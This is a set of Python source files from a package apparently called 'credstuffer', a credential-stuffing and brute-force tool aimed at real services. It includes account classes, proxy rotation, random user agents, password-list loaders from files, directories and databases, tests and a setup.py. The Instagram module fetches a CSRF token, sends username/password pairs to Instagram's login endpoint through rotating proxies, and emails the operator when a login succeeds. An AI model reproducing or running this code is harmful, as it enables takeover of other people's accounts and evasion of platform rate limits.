        self.assertIsInstance(one_row, tuple, msg="one row must be of type tuple")
        self.assertEqual(one_row[0], 0, msg="first element in one_row must be 0")
        self.assertEqual(one_row[1], 'abc', msg="second element in one_row must be 'abc'")

    def test_many(self):

        sql = "select * from test"
        rows = self.fetcher.many(sql=sql, size=2)

        self.assertIsInstance(rows, list, msg="rows must be of type tuple")
        self.assertEqual(len(rows), 2, msg="rows must be of length 2")

    def test_all(self):

        sql = "select * from test"
        all = self.fetcher.all(sql=sql)

        self.assertIsInstance(all, list, msg="rows must be of type tuple")
        self.assertEqual(len(all), 3, msg="rows must be of length 2")

    def tearDown(self) -> None:

        sql = "delete from test"
        self.inserter.sql(sql=sql)


if __name__ == '__main__':
    unittest.main()



import os
import requests
import logging
import random
from http.client import HTTPConnection
from abc import ABC, abstractmethod

user_agent_list = [
     #  Chrome
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
    'Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
     #  Firefox
    'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)',
    'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
    'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)',
    'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
    'Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko',
    'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
    'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)',
    'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
    'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
    'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko',
    'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
    'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
    'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'
]


class Account(ABC):
    """ Abstract Base Class Account to provide basic methods for account specific attributes

    """
    def __init__(self):
        self.logger = logging.getLogger('credstuffer')

        self.root_dir = os.path.dirname(os.path.abspath(__file__))

        self.session = requests.Session()
        self.login_request_timeout = 4
        self.headers = {
            'Accept-Encoding': 'gzip, deflate, br',
            'Accept-Language': 'de-DE,en-EN;q=0.9',
            'User-Agent': random.choice(user_agent_list),
            'Accept': 'application/json, text/plain, */*',
        }
        self.proxy_test_url = 'http://www.google.com'
        self.proxy_test_timeout = 2

        self.filename = 'cracked_'

    def __del__(self):
        """destructor"""

        self.session.close()

    @abstractmethod
    def set_proxy(self, proxy):
        """ sets a proxy to the current session

        """
        pass

    def is_proxy_alive(self, proxy):
        """ checks if a proxy is alive

        :param proxy: proxy as ip:port
        :return: True if alive
        """
        try:
            self.session.proxies = proxy
            proxy_test_response = self.session.get(self.proxy_test_url, headers=self.headers,
                                                   timeout=self.proxy_test_timeout, allow_redirects=False)
            if proxy_test_response.status_code == 200:
                return True
        except requests.exceptions.RequestException as e:
            self.logger.error(e)
            return False
        except Exception as ex:
            self.logger.error(ex)
            return False

    def is_internet_available(self):
        """ checks if internet is available with a head request to google.com

        :return: True if internet is available, else False
        """

        conn = HTTPConnection("www.google.com", timeout=2)
        try:
            conn.request("HEAD", "/")
            conn.close()
            return True
        except Exception as ex:
            return False

    def set_random_user_agent(self):
        """ sets an user agent from list

        """
        self.logger.info("Renew the user-agent for the request")
        self.headers['User-Agent'] = random.choice(user_agent_list)




import logging
from credstuffer import EmailAccount


class Facebook(EmailAccount):
    """ class Facebook to provide basic methods for credstuffing facebook.com

    USAGE:
            facebook = Facebook()

    """
    def __init__(self):
        self.logger = logging.getLogger('credstuffer')
        self.logger.info('create class Facebook')

        # init base class
        super().__init__()

    def login(self, username, password):
        """

        :param username:
        :param password:
        :return:
        """
        print("facebook")
        pass

    def set_proxy(self, proxy):
        """

        :return:
        """
        pass



import logging
from credstuffer.db.connector import DBConnector


class DBFetcher(DBConnector):
    """ class DBFetcher to fetch data from database tables

    USAGE:
            fetcher = DBFetcher()
            fetcher.connect(host, port, username, password, dbname, minConn=1, maxConn=10)
            fetcher.many(sql=sql, size=20)

    """
    def __init__(self):
        self.logger = logging.getLogger('credstuffer')
        self.logger.info('create class DBFetcher')

        # init connector base class
        super().__init__()

    def one(self, sql, data=None, autocommit=False):
        """ fetches one row from sql statement

        :param sql: sql statement
        :param data: data for sql statement
        :param autocommit: True or False

        :return: one row from table
        """
        with self.get_cursor(autocommit=autocommit) as cursor:
            if self.is_sqlite:
                sql = sql.replace('%s', '?')

            if data is None:
                cursor.execute(sql)
            else:
                cursor.execute(sql, data)
            return cursor.fetchone()

    def many(self, sql, data=None, size=None, autocommit=False):
        """ fetches many rows (size) from sql statement

        :param sql: sql statement
        :param data: data for sql statement
        :param size: size of rows
        :param autocommit: True or False

        :return: many rows from table
        """
        with self.get_cursor(autocommit=autocommit) as cursor:
            if self.is_sqlite:
                sql = sql.replace('%s', '?')

            if data is None:
                cursor.execute(sql)
            else:
                cursor.execute(sql, data)
            return cursor.fetchmany(size=size)

    def all(self, sql, data=None, autocommit=False):
        """ fetches all rows from sql statement

        :param sql: sql statement
        :param data: data for sql statement
        :param autocommit: True or False

        :return: all rows from table
        """
        with self.get_cursor(autocommit=autocommit) as cursor:
            if self.is_sqlite:
                sql = sql.replace('%s', '?')

            if data is None:
                cursor.execute(sql)
            else:
                cursor.execute(sql, data)
            return cursor.fetchall()



import logging
from time import sleep

from credstuffer import UserAccount
from credstuffer.database_stuffer import DatabaseStuffer
from credstuffer.file_stuffer import FileStuffer
from credstuffer.directory_stuffer import DirectoryStuffer


class Algorithm:
    """ class Algorithm to execute the credential stuffing algorithm

    USAGE:
            algo = Algorithm(accounts=accounts, usernames=usernames)
            algo.file_stuffing(filepath='/tmp')
    """
    def __init__(self, accounts, usernames):
        self.logger = logging.getLogger('credstuffer')
        self.logger.info('create class Algorithm')

        self.usernames = [user.strip() for user in usernames]  # strip leading trailing whitespaces
        self.accounts = accounts

        for account in self.accounts:
            account.set_usernames(usernames=self.usernames)

        self.schema_list = list('abcdefghijklmnopqrstuvwxyz')

    def database_stuffing(self, **dbparams):
        """ creates the DatabaseStuffer instance and starts the run thread

        """
        processes = list()
        for c_schema in self.schema_list:
            stuffer = DatabaseStuffer(account=self.accounts, schema_char=c_schema, **dbparams)
            stuffer.start()
            processes.append(stuffer)
            if len(processes) == 6:
                wait = True
                while wait:
                    for proc in processes:
                        if not proc.is_alive():
                            self.logger.info("Start new Process")
                            wait = False
                    sleep(1)

    def file_stuffing(self, filepath):
        """ creates the FileStuffer instance and starts the run thread

        """
        # handle one file for credential stuffing
        stuffer = FileStuffer(account=self.accounts[0], filepath=filepath)
        stuffer.start()

    def directory_stuffing(self, dirpath):
        """ creates the DirectoryStuffer instance and starts the run thread

        """
        # handle multiple files within the given dirpath
        stuffer = DirectoryStuffer(account=self.accounts[0], directory_path=dirpath)
        stuffer.start()




import unittest
from credstuffer import Proxy


class TestProxy(unittest.TestCase):

    def setUp(self) -> None:

        # set up Proxy instance
        self.proxy = Proxy(timeout_ms=50)

    def test_get(self):

        proxy = self.proxy.get()

        self.assertIsInstance(proxy, str, msg="proxy must be type of string")

    def test_load_proxies(self):

        proxy_list = self.proxy.load_proxies(timeout=50)

        self.assertIsInstance(proxy_list, list, msg="proxy list must be type of list")
        for proxy in proxy_list:
            self.assertIsInstance(proxy, str, msg="proxy must be type of string")

    def tearDown(self) -> None:
        pass


if __name__ == '__main__':
    unittest.main()



from setuptools import setup, find_packages
from credstuffer import __version__, __author__, __email__, __license__, __title__

with open('requirements.txt') as f:
    required = f.read().splitlines()

with open("README.md", encoding='utf-8') as f:
    readme = f.read()

with open("CHANGELOG.rst") as f:
    changelog = f.read()


setup(
    name=__title__,
    version=__version__,
    description="credentials stuffer",
    long_description=readme,
    long_description_content_type='text/markdown',
    license=__license__,
    author=__author__,
    author_email=__email__,
    url="https://github.com/bierschi/credstuffer",
    packages=find_packages(),
    package_data={'credstuffer': ['config/cfg_example.ini']},
    install_requires=required,
    keywords=["credstuffer", "credentials", "stuffing", "hacking", "bruteforce"],
    python_requires=">=3",
    classifiers=[
        "Development Status :: 4 - Beta",
        "Intended Audience :: Developers",
        "Intended Audience :: End Users/Desktop",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
        "Programming Language :: Python",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.3",
        "Programming Language :: Python :: 3.4",
        "Programming Language :: Python :: 3.5",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: Implementation :: PyPy",
    ],
    entry_points={
        "console_scripts": [
            'credstuffer = credstuffer.app:main'
        ],
    },
    zip_safe=False,
)



import logging
import threading
from credstuffer.stuffer import Stuffer


class FileStuffer(Stuffer, threading.Thread):
    """ class FileStuffer to execute the stuffing algorithm with files

    USAGE:
            filestuffer = Filestuffer(account=account, filepath=/tmp/)
            filestuffer.start()
    """
    def __init__(self, account, filepath):
        self.logger = logging.getLogger('credstuffer')
        self.logger.info('Create class FileStuffer')

        # init base class
        Stuffer.__init__(self, account=account)
        threading.Thread.__init__(self)

        self.filepath = filepath

    def run(self) -> None:
        """ executes the run thread for account logins """

        # set proxy to account
        self.set_account_proxy()

        # get passwords from file
        self.logger.info("Open file {} for stuffing".format(self.filepath))
        with open(self.filepath, 'r', encoding='utf-8', errors='ignore') as f:
            for lineno, line in enumerate(f):
                password = line.strip('\n')
                # execute login
                self.account_login(password=password)
                if (lineno % 2000) == 0:
                    self.logger.info("Line number {} with password {}".format(lineno, password))



import unittest


class TestTelegram(unittest.TestCase):

    def setUp(self) -> None:

        # set up Telegram instance
        pass

    def tearDown(self) -> None:
        pass


if __name__ == '__main__':
    unittest.main()



import logging
import multiprocessing
from time import sleep

from credstuffer.dbhandler import DBHandler
from credstuffer.stuffer import Stuffer


class DatabaseStuffer(Stuffer, multiprocessing.Process):
    """ class DatabaseStuffer to execute the stuffing algorithm with data from database

    USAGE:
            databasestuffer = DatabaseStuffer(account=account, schema_char='a', tables='abcdefghijklmnopqrstuvwxyz',
                                              **dbparams)
            databasestuffer.start()
    """
    def __init__(self, account, schema_char, tables='abcdefghijklmnopqrstuvwxyz', **dbparams):
        self.logger = logging.getLogger('credstuffer')
        self.logger.info('create class DatabaseStuffer')

        # init base classes
        Stuffer.__init__(self, account=account)
        multiprocessing.Process.__init__(self)

        self.schema_char = schema_char
        self.table_list = list(tables)
        self.dbparams = dbparams

    def run(self) -> None:
        """ executes the run process for account logins """

        # create database handler
        dbhandler = DBHandler(**self.dbparams)
        # set proxy to account
        self.set_account_proxy()

        # iterate over tables
        for table_char in self.table_list:
            if self.schema_char == 'symbols':
                self.logger.info("fetch data from {}.{}".format(self.schema_char, self.schema_char))
                passwords_data = dbhandler.fetch_data(schema=self.schema_char, table=self.schema_char)
            else:
                self.logger.info("fetch data from {}.{}".format(self.schema_char, table_char))
                passwords_data = dbhandler.fetch_data(schema=self.schema_char, table=table_char)
            for entry in passwords_data:
                if entry[0]:
                    password = entry[0]
                    # execute login
                    self.account_login(password=password)
                    sleep(0.001)









import argparse
import logging

from credstuffer.utils.logger import Logger
from credstuffer.algorithm import Algorithm
from credstuffer import __version__
from credstuffer.accounts import Comunio, Instagram
from credstuffer.exceptions import AccountInstanceError


class Credstuffer:
    """ class Credstuffer

    USAGE:
            credstuffer = Credstuffer()

    """
    def __init__(self, account, usernames, filepath=None, dirpath=None, **params):
        self.logger = logging.getLogger('credstuffer')
        self.logger.info('create class Credstuffer')

        self.account = account
        self.usernames = usernames
        self.filepath = filepath
        self.dirpath = dirpath
        self.mailparams = dict()
        self.dbparams = dict()

        if 'mail' in params.keys():
            if ('smtp' and 'port' and 'sender' and 'receiver' and 'password') in params['mail'].keys():
                self.mailparams.update(params['mail'])
        else:
            self.logger.error("No mail parameters provided!")

        if 'database' in params.keys():
            if ('host' and 'port' and 'username' and 'password' and 'dbname') in params['database'].keys():
                self.dbparams.update(params['database'])
        else:
            self.logger.error("No database parameters provided!")

        # create account instances
        self.accounts = list()
        account_instance = self.create_instance(account=self.account, max_requests=1000000, notify='mail', **self.mailparams)
        self.accounts.append(account_instance)

        # create the stuffing algorithm
        algo = Algorithm(accounts=self.accounts, usernames=self.usernames)
        if self.filepath is not None:
            algo.file_stuffing(filepath=self.filepath)
        elif self.dirpath is not None:
            algo.directory_stuffing(dirpath=self.dirpath)
        else:
            algo.database_stuffing(**self.dbparams)

    def create_instance(self, account, max_requests, notify, **kwargs):
        """ creates the account instance

        :param account: name of the account
        :param max_requests: max requests for the proxy
        :param notify: notify
        :param kwargs: keyword args
        :return: instance of the account attribute
        """
        if account == 'comunio':
            return Comunio(max_requests=max_requests, notify=notify, **kwargs)
        elif account == 'instagram':
            return Instagram(max_requests=max_requests, notify=notify, **kwargs)
        else:
            raise AccountInstanceError("Could not create Account Instance")


def main():

    # credstuffer usage
    usage1 = "credstuffer instagram --usernames \"John, Jane\" database --host 192.168.1.2 --port 5432 --user john " \
             "--password test1234 --dbname postgres"
    usage2 = "credstuffer facebook --usernames \"John, Jane\" file --path /home/john/credentials.txt"
    usage3 = "credstuffer comunio --usernames \"John, Jane\" --Nsmtp smtp.web.de --Nport 587 --Nsender john@web.de " \
             "--Nreceiver jane@web.de --Npassword johnjane file --dir /opt/collections/"

    description = "console script for application credstuffer \n\nUsage:\n    {}\n    {}\n    {}".format(usage1, usage2,
                                                                                                         usage3)
    # parse arguments for credstuffer
    parser = argparse.ArgumentParser(description=description, formatter_class=argparse.RawDescriptionHelpFormatter)

    # account required
    parser.add_argument('account', choices=['comunio', 'instagram', 'facebook'], help='The account you want to stuffing')
    subparsers = parser.add_subparsers(dest='subcommand', help='File or Database subcommands')

    # parser for file parameters
    parser_file = subparsers.add_parser('file', help='Path to a single file or a directory')
    parser_file.add_argument('-p', '--path', type=str, help='Path to a single file')
    parser_file.add_argument('-d', '--dir',  type=str, help='Path to a directory')

    # parser for database parameters
    parser_database = subparsers.add_parser('database', help='Database connection arguments')
    parser_database.add_argument('-H', '--host',     type=str, help='Hostname for the database connection', required=True)
    parser_database.add_argument('-P', '--port',     type=int, help='Port for the database connection', required=True)
    parser_database.add_argument('-U', '--user',     type=str, help='User for the database connection', required=True)
    parser_database.add_argument('-p', '--password', type=str, help='Password from the user', required=True)
    parser_database.add_argument('-DB', '--dbname',  type=str, help='Database name', required=True)

    # parser for notification parameters
    parser_notifyer = parser.add_argument_group('Notification', 'Define arguments for Mail or Telegram Notification')
    parser_notifyer.add_argument('--Nsmtp', type=str, help='SMTP email server')
    parser_notifyer.add_argument('--Nport', type=int, help='SMTP Port')
    parser_notifyer.add_argument('--Nsender', type=str, help='email from sender')
    parser_notifyer.add_argument('--Nreceiver', type=str, help='email from receiver')
    parser_notifyer.add_argument('--Npassword', type=str, help='password from sender email')

    # provide usernames for given account
    parser_usernames = parser.add_argument_group('Usernames', 'Provided Usernames for the account')
    parser_usernames.add_argument('--usernames', type=str,  help='Usernames for the given account')

    # TODO Telegram
    parser.add_argument('-v', '--version', action='version', version=__version__, help='show the current version')

    args = parser.parse_args()

    # set up logger instance
    logger = Logger(account=args.account, name='credstuffer', level='info', log_folder='/var/log/')
    logger.info("start application credstuffer")

    params = dict()
    nsmtp = args.Nsmtp
    nport = args.Nport
    nsender = args.Nsender
    nreceiver = args.Nreceiver
    npassword = args.Npassword

    params.setdefault('mail', {'smtp': nsmtp, 'port': nport, 'sender': nsender, 'receiver': nreceiver,
                               'password': npassword})

    if args.usernames is None:
        print("Please provide usernames for the given account")
        exit(0)
    else:
        account_usernames = args.usernames.split(',')

    if args.subcommand == 'file':
        if args.path is not None:
            logger.info("process credential file")

            credstuffer = Credstuffer(account=args.account, usernames=account_usernames, filepath=args.path, **params)
        else:
            credstuffer = Credstuffer(account=args.account, usernames=account_usernames, dirpath=args.dir, **params)

    else:
        logger.info("process database parameters")
        host = args.host
        port = args.port
        username = args.user
        password = args.password
        dbname = args.dbname
        params.setdefault('database', {'host': host, 'port': port, 'username': username, 'password': password,
                                       'dbname': dbname})

        credstuffer = Credstuffer(account=args.account, usernames=account_usernames, **params)


if __name__ == '__main__':
    main()



import re
import logging
import requests
from concurrent.futures import ThreadPoolExecutor, as_completed

from credstuffer import UserAccount
from credstuffer.exceptions import ProxyNotSetError, ProxyMaxRequestError, ProxyBadConnectionError


class Instagram(UserAccount):
    """ class Instagram to provide basic methods for credstuffing instagram.com

    USAGE:
            instagram = Instagram()

    """
    usernames = list()

    def __init__(self, max_requests=10000, notify=None, **kwargs):
        self.logger = logging.getLogger('credstuffer')
        self.logger.info('create class Instagram')
        self.name = 'Instagram'

        # init base class
        super().__init__(name=self.name, notify=notify, **kwargs)

        self.url_login = "https://www.instagram.com/accounts/login/ajax/"

        self.url = "https://www.instagram.com/"
        self.csrf_token = self.get_csrf_token()
        self.session.headers.update({
                "Accept": "*/*",
                "Connection": "keep-alive",
                "Host": "www.instagram.com",
                "Origin": "https://www.instagram.com",
                "Referer": "https://www.instagram.com/",
                "X-Instagram-AJAX": "1",
                "Content-Type": "application/x-www-form-urlencoded",
                "X-Requested-With": "XMLHttpRequest",
                "X-CSRFToken": self.csrf_token
            })

        self.max_requests = max_requests
        self.request_counter = 0

    def set_usernames(self, usernames):
        """ sets usernames for instagram account

        :param usernames: list of usernames
        """
        if isinstance(usernames, list):
            self.usernames.extend(usernames)
        else:
            self.usernames.append(usernames)

    def get_csrf_token(self):
        """ get the csrf token from the webpage

        :return: csrf token
        """

        resp = self.session.get(url=self.url)

        csrf_token = re.search('(?<="csrf_token":")\\w+', resp.text).group(0)
        return csrf_token

    def login(self, password):
        """ requests given login data to the account

        :return: None or request Response
        """

        # check if proxy is set
        if self.session.proxies:

            # check if we need a new proxy
            if self.request_counter < self.max_requests:

                with ThreadPoolExecutor(max_workers=len(self.usernames)) as executor:

                    future_response = {executor.submit(self.__request_login, user, password): user for user in self.usernames}
                    for future in as_completed(future_response):
                        user = future_response[future]
                        statuscode = future.result().status_code
                        resp_json = future.result().json()
                        print(resp_json)
                        self.logger.info("response code: {} from Instagram with username: {}, password: {}, proxy: {}"
                                         .format(statuscode, user, password, self.session.proxies['http']))

                        if resp_json.get('message') == 'checkpoint_required':
                            self.logger.info("Found correct combination of user: {} and password: {}"
                                             .format(user, password))
                            self.send_notification(username=user, password=password)
                        elif (resp_json.get('authenticated') is False) and (resp_json.get('user') is False):
                            self.logger.error("User: {} not available!!".format(user))
                        elif (resp_json.get('authenticated') is False) and (resp_json.get('user') is True):
                            self.logger.info("Wrong password for user: {} and password: {}".format(user, password))
                        elif statuscode == 500:
                            self.logger.error(future.result().text)
            else:
                # raise Error to renew Proxy
                self.request_counter = 0
                self.logger.error("Max number of proxy requests reached!. Renew Proxy")
                raise ProxyMaxRequestError("Max number of proxy requests reached!")
        else:
            raise ProxyNotSetError("No Proxy was set!")

    def __request_login(self, username, password):
        """ request login with an session object

        :return: Request response object
        """
        login_form = {"username": username, "password": password}

        try:
            request_login = self.session.post(self.url_login, data=login_form, timeout=self.login_request_timeout,
                                              allow_redirects=True)

            self.request_counter += 1
        except (requests.exceptions.ProxyError, requests.exceptions.ConnectTimeout, requests.exceptions.ReadTimeout) as \
                ex:
            raise ProxyBadConnectionError("Proxy Bad Connection")

        except requests.exceptions.RequestException as ex:
            raise ProxyBadConnectionError("Proxy Bad Connection")

        return request_login

    def set_proxy(self, proxy):
        """ sets a proxy

        """
        if isinstance(proxy, dict):
            self.logger.info("set proxy to {}".format(proxy['http']))
            self.session.proxies = proxy
        else:
            raise TypeError("proxy must be type of dictionary!")


if __name__ == '__main__':
    insta = Instagram()
    insta.set_proxy(proxy={'http': '94.23.218.85:80'})
    insta.set_usernames(usernames=[""])
    insta.login(password="")




import logging
from credstuffer.db.connector import DBConnector
from credstuffer.exceptions import DBCreatorError


class Database:
    """ class Database to build a sql string for Database creation

    USAGE:
            Database(name="web")

    """
    def __init__(self, name):
        self.logger = logging.getLogger('credstuffer')
        self.logger.info('create class Database')

        self.name = name

    def __str__(self):
        """ string representation of database creation

        :return: sql string for database creation
        """
        return "create database {}".format(self.name)

    def __repr__(self):
        """ string representation of database object

        :return: sql string for database creation
        """
        return "create database {}".format(self.name)


class Schema:
    """ class Schema to build a sql string for Schema creation

    USAGE:
            Schema(name="credstuffer")

    """
    def __init__(self, name):
        self.logger = logging.getLogger('credstuffer')

        self.name = name

        self.sql_schema = "create schema if not exists {}".format(self.name)

    def __str__(self):
        """ string representation of schema creation

        :return: sql string for schema creation
        """
        return self.sql_schema

    def __repr__(self):
        """ string representation of schema object

        :return: sql string for schema creation
        """
        return self.sql_schema


class Table:
    """ class Table to build a sql string for Table creation

    USAGE:
            Table("page", Column('id', 'int', False, False), schema="web")
            Table("page")

    """
    def __init__(self, name, *columns, schema=None):
        self.logger = logging.getLogger('credstuffer')

        self.name = name
        self.schema = schema
        self.sql_table = ""

        if schema is None:
            self.sql_table = "create table if not exists {} ".format(self.name)
        else:
            self.sql_table = "create table if not exists  {}.{} ".format(self.schema, self.name)

        if len(columns) == 0:
            self.sql_table = self.sql_table + "()"
        elif len(columns) == 1:
            self.sql_table = self.sql_table + str(columns).replace(',', '')
        elif len(columns) > 1:
            self.sql_table = self.sql_table + str(columns)

    def __call__(self, *columns):
        """ implicit method to invoke table instances to create new sql strings with variable *columns objects

        :param columns: objects of type Column()
        :return: sql table creation string
        """

        if len(columns) == 1:
            self.sql_table = self.sql_table + str(columns).replace(',', '')
            return self.sql_table
        elif len(columns) > 1:
            self.sql_table = self.sql_table + str(columns)
            return self.sql_table

    def __str__(self):
        """ string representation of table creation

        :return: sql string for table creation
        """
        return self.sql_table

    def __repr__(self):
        """ string representation of table object

        :return: sql string for table creation
        """
        return self.sql_table


class Column:
    """ class Column to build a sql string for Column creation

    USAGE:
            Column(name='id', type='int', not_null=False, prim_key=True)

    """
    def __init__(self, name, type, not_null=False, prim_key=False, exist_table=False, table_name=None, schema=None):
        self.logger = logging.getLogger('credstuffer')

        self.name = name
        self.type = type
        self.not_null = not_null
        self.prim_key = prim_key
        self.exist_table = exist_table
        self.table_name = table_name
        self.schema = schema

        if self.schema is None:
            self.alter_table = "alter table {} ".format(self.table_name)
        else:
            self.alter_table = "alter table {}.{} ".format(self.schema, self.table_name)

        self.name_type_str     = "{} {} ".format(self.name, self.type)
        self.add_column_str    = "add column "
        self.primary_key_str   = "primary key "
        self.not_null_str      = "not null "
        self.if_not_exists     = "if not exists "

        self.sql_primary_key = self.name_type_str + self.primary_key_str
        self.sql_not_null    = self.name_type_str + self.not_null_str
        self.sql_exist_table = self.alter_table + self.add_column_str + self.if_not_exists + self.name_type_str
        self.sql_exist_table_prim_key = self.sql_exist_table + self.primary_key_str
        self.sql_exit_table_not_null  = self.sql_exist_table + self.not_null_str

    def __str__(self):
        """ string representation of column creation

        :return: sql string for column creation
        """
        if self.prim_key and not self.not_null and not self.exist_table:
            return self.sql_primary_key
        if self.not_null and not self.prim_key and not self.exist_table:
            return self.sql_not_null
        if self.exist_table and not self.prim_key and not self.not_null:
            return self.sql_exist_table
        if self.exist_table and self.prim_key:
            return self.sql_exist_table_prim_key
        if self.exist_table and self.not_null:
            return self.sql_exit_table_not_null
        else:
            return "{} {} ".format(self.name, self.type)

    def __repr__(self):
        """ string representation of column object

        :return: sql string for column creation
        """
        if self.prim_key and not self.not_null and not self.exist_table:
            return self.sql_primary_key
        if self.not_null and not self.prim_key and not self.exist_table:
            return self.sql_not_null
        if self.exist_table and not self.prim_key and not self.not_null:
            return self.sql_exist_table
        if self.exist_table and self.prim_key:
            return self.sql_exist_table_prim_key
        if self.exist_table and self.not_null:
            return self.sql_exit_table_not_null
        else:
            return "{} {} ".format(self.name, self.type)


class DBCreator(DBConnector):
    """ class DBCreator to build database, table or column

    USAGE:
            creator = DBCreator()
            creator.connect(host, port, username, password, dbname, minConn=1, maxConn=10)
            creator.build(obj=Database(name="web"))
            creator.build(obj=Table("gps", Column('did', 'text'), Column('ts', 'text')))

    """
    def __init__(self):
        self.logger = logging.getLogger('credstuffer')
        self.logger.info('create class DBCreator')

        # init connector base class
        super().__init__()

    def build(self, obj):
        """ build object depending on given object 'obj'

        """
        if isinstance(obj, Database):
            self.__database(obj)
        elif isinstance(obj, Schema):
            self.__schema(obj)
        elif isinstance(obj, Table):
            self.__table(obj)
        elif isinstance(obj, Column):
            self.__column(obj)
        else:
            raise DBCreatorError("Provide either a Database, Schema, Table or Column object")

    def __database(self, database_obj):
        """ creates a database

        :param database_obj: database object
        """
        with self.get_cursor(autocommit=True) as cursor:
            cursor.execute(str(database_obj))

    def __schema(self, schema_obj):
        """creates a Schema

        :param schema_obj: schema object
        """
        with self.get_cursor() as cursor:
            cursor.execute(str(schema_obj))

    def __table(self, table_obj):
        """ creates a table

        :param table_obj: table object
        """
        with self.get_cursor() as cursor:
            cursor.execute(str(table_obj))

    def __column(self, column_obj):
        """ creates a column

        :param column_obj: column object
        """
        # only possible in existing table
        if column_obj.exist_table:
            with self.get_cursor() as cursor:
                cursor.execute(str(column_obj))
        else:
            raise DBCreatorError("Creation of column object is only possible in existing tables")




import logging
from time import sleep
from credstuffer.proxy import Proxy
from credstuffer.exceptions import ProxyMaxRequestError, ProxyBadConnectionError, InternetConnectionError


class Stuffer:
    """ Base class Stuffer to provide basic methods for the stuffing algorithm

    USAGE:
            stuffer = Stuffer(account=account, timeout_ms=50)

    """
    def __init__(self, account, timeout_ms=50):
        self.logger = logging.getLogger('credstuffer')
        self.logger.info('Create class Stuffer')

        self.account = account

        self.proxy = Proxy(timeout_ms=timeout_ms)
        self.http_str = 'http://'
        self.https_str = 'https://'

    def set_account_proxy(self):
        """ sets a proxy for the given account

        :param account: account instance
        """

        proxy_alive = False
        while not proxy_alive:
            proxy = self.__get_proxy_dict()
            if self.account.is_proxy_alive(proxy=proxy):
                self.account.set_proxy(proxy=proxy)
                # proxy was renewed therefore the user agent shall be renewed as well
                self.account.set_random_user_agent()
                proxy_alive = True

    def account_login(self, password):
        """ executes the account login with given password

        """
        try:
            self.account.login(password)
        except (ProxyMaxRequestError, ProxyBadConnectionError) as ex:
            self.logger.error("ProxyError: {}".format(ex))
            self.set_account_proxy()
            self.account_login(password=password)
        except InternetConnectionError as ex:
            self.logger.error("No Internet Connection: {}".format(ex))
            sleep(10)
            self.account_login(password=password)

    def __get_proxy_dict(self):
        """ get proxy dictionary

        :return: dict with 'http' proxy
        """
        proxy = self.proxy.get()
        http_proxy = self.http_str + proxy

        return {'http': http_proxy}
